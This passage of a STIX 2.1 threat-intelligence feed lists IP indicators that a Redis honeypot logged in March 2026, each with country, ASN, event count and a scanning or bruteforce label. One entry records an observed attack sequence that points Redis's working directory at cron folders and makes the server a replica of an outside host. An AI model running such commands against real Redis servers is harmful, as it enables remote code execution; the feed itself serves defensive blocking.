      "modified": "2026-03-17T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '112.112.212.129']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T19:25:13.000Z",
      "valid_until": "2026-04-18T19:25:12.000Z"
    },
    {
      "created": "2026-03-17T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=11; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmds=CONFIG GET dir; redis_cmd_hits=0; cmd=\"CONFIG GET dir\"",
      "id": "indicator--74b25f1c-8b7f-4a0f-89eb-9eea3f7f2cb9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '117.44.49.181']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T19:25:13.000Z",
      "valid_until": "2026-04-18T19:25:12.000Z"
    },
    {
      "created": "2026-03-17T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--0677222c-c9c2-4cea-93a6-e7ac32e37333",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '172.210.68.13']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T19:25:13.000Z",
      "valid_until": "2026-04-18T19:25:12.000Z"
    },
    {
      "created": "2026-03-17T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--190c2be7-d23c-4a8a-901d-fadfc0e560b0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-17T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.103.36.53']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T19:25:13.000Z",
      "valid_until": "2026-04-18T19:25:12.000Z"
    },
    {
      "created": "2026-03-17T23:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=US; asn=202425; asn_org=IP Volume inc; redis_cmd_hits=0",
      "id": "indicator--40896853-3009-47fd-a6f0-e87fec45e6da",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-17T23:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '185.242.226.44']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T23:25:13.000Z",
      "valid_until": "2026-04-18T23:25:12.000Z"
    },
    {
      "created": "2026-03-17T23:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=50; ports=6379; cc=US; asn=215925; asn_org=Vpsvault.host Ltd; redis_cmds=CONFIG SET dir /var/spool/cron/,REPLICAOF 45.205.1.110 6380,CONFIG GET dir,SLAVEOF 45.205.1.110 6380,CONFIG SET dir /etc/cron.d/; redis_cmd_hits=0; cmd=\"SLAVEOF 45.205.1.110 6380\"",
      "id": "indicator--9295d8fa-131a-4097-9117-86f609578261",
      "labels": [
        "command_and_control"
      ],
      "modified": "2026-03-17T23:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.205.1.110']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-17T23:25:13.000Z",
      "valid_until": "2026-04-18T23:25:12.000Z"
    },
    {
      "created": "2026-03-18T01:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=TR; asn=47524; asn_org=Turksat Uydu Haberlesme ve Kablo TV Isletme A.S.; redis_cmd_hits=0",
      "id": "indicator--f9c22d7a-8c76-4bd2-8068-e1f77f4d3dda",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T01:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '176.240.149.82']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T01:25:13.000Z",
      "valid_until": "2026-04-19T01:25:12.000Z"
    },
    {
      "created": "2026-03-18T03:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; redis_cmd_hits=0",
      "id": "indicator--722a056f-e91a-4edc-b195-25040eba1616",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T03:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '122.96.28.59']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T03:25:14.000Z",
      "valid_until": "2026-04-19T03:25:13.000Z"
    },
    {
      "created": "2026-03-18T03:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=16509; asn_org=Amazon.com, Inc.; redis_cmd_hits=0",
      "id": "indicator--0398371a-a457-4d26-866d-8d929750108b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T03:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '18.189.74.1']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T03:25:14.000Z",
      "valid_until": "2026-04-19T03:25:13.000Z"
    },
    {
      "created": "2026-03-18T03:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=4134; asn_org=Chinanet; redis_cmd_hits=0",
      "id": "indicator--16a11a15-79ba-4f99-86c6-8243f661df84",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T03:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.138.158.254']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T03:25:14.000Z",
      "valid_until": "2026-04-19T03:25:13.000Z"
    },
    {
      "created": "2026-03-18T03:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=24; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--a75de153-758a-4718-957c-93fb7cc11bcf",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T03:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '182.92.202.149']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T03:25:14.000Z",
      "valid_until": "2026-04-19T03:25:13.000Z"
    },
    {
      "created": "2026-03-18T04:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=TZ; asn=327795; asn_org=Tanzania-e-Government-Agency; redis_cmd_hits=0",
      "id": "indicator--d111d64d-5ded-46da-8b6f-9052feb860d6",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T04:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '154.118.228.190']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T04:25:14.000Z",
      "valid_until": "2026-04-19T04:25:12.000Z"
    },
    {
      "created": "2026-03-18T04:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=7; ports=6379; cc=AU; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--d8cd392b-2142-4b55-935f-214eed7a20c9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T04:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '4.147.233.182']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T04:25:14.000Z",
      "valid_until": "2026-04-19T04:25:12.000Z"
    },
    {
      "created": "2026-03-18T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--b60104d4-b786-42fe-9290-d4c20f25259d",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.113']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T05:25:13.000Z",
      "valid_until": "2026-04-19T05:25:12.000Z"
    },
    {
      "created": "2026-03-18T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--6a7dc374-4000-4334-ad82-e71be4c2c62b",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.94.138.147']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T05:25:13.000Z",
      "valid_until": "2026-04-19T05:25:12.000Z"
    },
    {
      "created": "2026-03-18T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=VU; asn=212512; asn_org=Detai Prosperous Technologies Limited; redis_cmd_hits=0",
      "id": "indicator--d1917d33-fdbd-4a0b-b93c-097d094616c4",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '194.127.165.69']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T05:25:13.000Z",
      "valid_until": "2026-04-19T05:25:12.000Z"
    },
    {
      "created": "2026-03-18T05:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=46; ports=6379; cc=DE; asn=212512; asn_org=Detai Prosperous Technologies Limited; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--2505a098-300b-4d24-920a-048ca2c1439a",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T05:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '45.82.78.104']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T05:25:13.000Z",
      "valid_until": "2026-04-19T05:25:12.000Z"
    },
    {
      "created": "2026-03-18T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=22611; asn_org=InMotion Hosting, Inc.; redis_cmd_hits=0",
      "id": "indicator--2712108b-ae29-41e3-8a79-bf8c847752c6",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '173.231.231.12']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T06:25:13.000Z",
      "valid_until": "2026-04-19T06:25:12.000Z"
    },
    {
      "created": "2026-03-18T06:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--1b36e076-e2a7-4fb8-beea-be356134d663",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T06:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.117.87.239']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T06:25:13.000Z",
      "valid_until": "2026-04-19T06:25:12.000Z"
    },
    {
      "created": "2026-03-18T08:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--4f54a37c-8bec-4d22-9b47-2045fb3fdb4e",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T08:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '205.210.31.223']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T08:25:14.000Z",
      "valid_until": "2026-04-19T08:25:12.000Z"
    },
    {
      "created": "2026-03-18T09:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--3f47ff07-f272-4420-833b-d85e2e6c60ed",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T09:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '167.248.133.113']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T09:25:13.000Z",
      "valid_until": "2026-04-19T09:25:12.000Z"
    },
    {
      "created": "2026-03-18T11:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=6; ports=6379; cc=CN; asn=37963; asn_org=Hangzhou Alibaba Advertising Co.,Ltd.; redis_cmd_hits=0",
      "id": "indicator--f7689987-cd2c-4ba9-8068-364e17d90c5f",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T11:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.98.205.94']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T11:25:13.000Z",
      "valid_until": "2026-04-19T11:25:12.000Z"
    },
    {
      "created": "2026-03-18T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=CN; asn=134420; asn_org=Chongqing Telecom; redis_cmd_hits=0",
      "id": "indicator--557c786f-025b-4beb-b4f3-73a223df2dd1",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '113.249.112.198']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T12:25:13.000Z",
      "valid_until": "2026-04-19T12:25:12.000Z"
    },
    {
      "created": "2026-03-18T12:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=DE; asn=132203; asn_org=Tencent Building, Kejizhongyi Avenue; redis_cmd_hits=0",
      "id": "indicator--c9de93a6-4808-44aa-8ea4-348909ec0d63",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T12:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '43.131.24.93']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T12:25:13.000Z",
      "valid_until": "2026-04-19T12:25:12.000Z"
    },
    {
      "created": "2026-03-18T13:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--b1c2f60d-867c-4f29-932d-2649c75e4931",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T13:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '52.226.214.210']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T13:25:13.000Z",
      "valid_until": "2026-04-19T13:25:12.000Z"
    },
    {
      "created": "2026-03-18T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=20; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--c6fbd370-fcac-4eff-b97a-bf965897fcde",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '178.128.66.56']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T14:25:13.000Z",
      "valid_until": "2026-04-19T14:25:12.000Z"
    },
    {
      "created": "2026-03-18T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=28; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--e2279554-6d61-4a3a-a615-90ead5d02040",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.66']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T14:25:13.000Z",
      "valid_until": "2026-04-19T14:25:12.000Z"
    },
    {
      "created": "2026-03-18T14:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=4; ports=6379; cc=US; asn=6939; asn_org=Hurricane Electric LLC; redis_cmd_hits=0",
      "id": "indicator--afa45f83-865a-4f3d-ae59-3e24a35e3234",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-18T14:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '64.62.156.77']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T14:25:13.000Z",
      "valid_until": "2026-04-19T14:25:12.000Z"
    },
    {
      "created": "2026-03-18T15:25:15.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=CA; asn=209334; asn_org=Modat B.V.; redis_cmds='GET / HTTP/1.1; redis_cmd_hits=0",
      "id": "indicator--d76abae8-cba0-47b2-beb8-28fa18183250",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T15:25:15.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '85.217.149.18']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T15:25:15.000Z",
      "valid_until": "2026-04-19T15:25:12.000Z"
    },
    {
      "created": "2026-03-18T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=US; asn=20115; asn_org=Charter Communications LLC; redis_cmd_hits=0",
      "id": "indicator--011feeda-3250-43aa-b50b-7037522932b0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '47.233.120.180']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T17:25:13.000Z",
      "valid_until": "2026-04-19T17:25:12.000Z"
    },
    {
      "created": "2026-03-18T17:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=19; ports=6379; cc=US; asn=10439; asn_org=CariNet, Inc.; redis_cmd_hits=0",
      "id": "indicator--28505e21-022e-43f0-8b55-6b886ae2ced0",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T17:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '71.6.232.24']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T17:25:13.000Z",
      "valid_until": "2026-04-19T17:25:12.000Z"
    },
    {
      "created": "2026-03-18T19:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--06c9b94e-77c8-437e-b143-7d26f897d259",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T19:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.81.46.143']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T19:25:13.000Z",
      "valid_until": "2026-04-19T19:25:12.000Z"
    },
    {
      "created": "2026-03-18T20:25:07.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=10; ports=6379; cc=US; asn=396982; asn_org=Google LLC; cats=Generic Protocol Command Decode; redis_cmd_hits=0",
      "id": "indicator--4ce44850-fe1e-48c6-8334-9a0c45fc7df1",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T20:25:07.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '147.185.132.105']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T20:25:07.000Z",
      "valid_until": "2026-04-19T20:25:06.000Z"
    },
    {
      "created": "2026-03-18T22:25:04.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=26; ports=6379; cc=RU; asn=34665; asn_org=Petersburg Internet Network ltd.; cats=Generic Protocol Command Decode; redis_cmds=GET / HTTP/1.0; redis_cmd_hits=0",
      "id": "indicator--a0bd1a2a-dafc-4bcf-87cc-69bf53f0537b",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-18T22:25:04.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '5.101.64.6']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-18T22:25:04.000Z",
      "valid_until": "2026-04-19T22:25:01.000Z"
    },
    {
      "created": "2026-03-19T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=15; ports=6379; cc=US; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--2dcc92cf-8db4-4323-9e91-a1b04f9f30a9",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.169.49.41']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T00:25:13.000Z",
      "valid_until": "2026-04-20T00:25:12.000Z"
    },
    {
      "created": "2026-03-19T00:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=9; ports=6379; cc=IN; asn=8075; asn_org=Microsoft Corporation; redis_cmd_hits=0",
      "id": "indicator--846c2b43-dcd0-4167-9d4a-742f4e20790c",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T00:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '20.235.199.173']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T00:25:13.000Z",
      "valid_until": "2026-04-20T00:25:12.000Z"
    },
    {
      "created": "2026-03-19T02:25:13.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=8; ports=6379; cc=AU; asn=63949; asn_org=Akamai Connected Cloud; cats=Misc activity; redis_cmd_hits=0",
      "id": "indicator--d4225d28-8876-461a-88dd-495a045f11ef",
      "labels": [
        "bruteforce"
      ],
      "modified": "2026-03-19T02:25:13.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '192.46.221.9']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T02:25:13.000Z",
      "valid_until": "2026-04-20T02:25:11.000Z"
    },
    {
      "created": "2026-03-19T03:25:14.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=US; asn=14061; asn_org=DigitalOcean, LLC; redis_cmd_hits=0",
      "id": "indicator--d444a884-2dc3-4a9f-b98f-322b11c5202e",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T03:25:14.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '134.209.64.9']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T03:25:14.000Z",
      "valid_until": "2026-04-20T03:25:11.000Z"
    },
    {
      "created": "2026-03-19T06:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=5; ports=6379; cc=TR; asn=42807; asn_org=Cizgi Telekomunikasyon Anonim Sirketi; redis_cmd_hits=0",
      "id": "indicator--ddf1357a-a18d-4de0-b237-d720455ac9aa",
      "labels": [
        "scanning_host"
      ],
      "modified": "2026-03-19T06:25:02.000Z",
      "name": "OTX pulse_name=Redishoneypot \u2192 Attacker IPs \u2013 Australia \u2013 March 2026",
      "pattern": "[ipv4-addr:value = '152.89.37.189']",
      "pattern_type": "stix",
      "pattern_version": "2.1",
      "spec_version": "2.1",
      "type": "indicator",
      "valid_from": "2026-03-19T06:25:02.000Z",
      "valid_until": "2026-04-20T06:25:01.000Z"
    },
    {
      "created": "2026-03-19T06:25:02.000Z",
      "description": "Attacker IP \u2022 Redis / seen in Redishoneypot; events=12; ports=6379; cc=US; asn=398324; asn_org=Censys, Inc.; redis_cmd_hits=0",
      "id": "indicator--a37b510b-57ed-41e1-99a7-32d34ac03483",
      "labels": [
        "bruteforce"
      ],
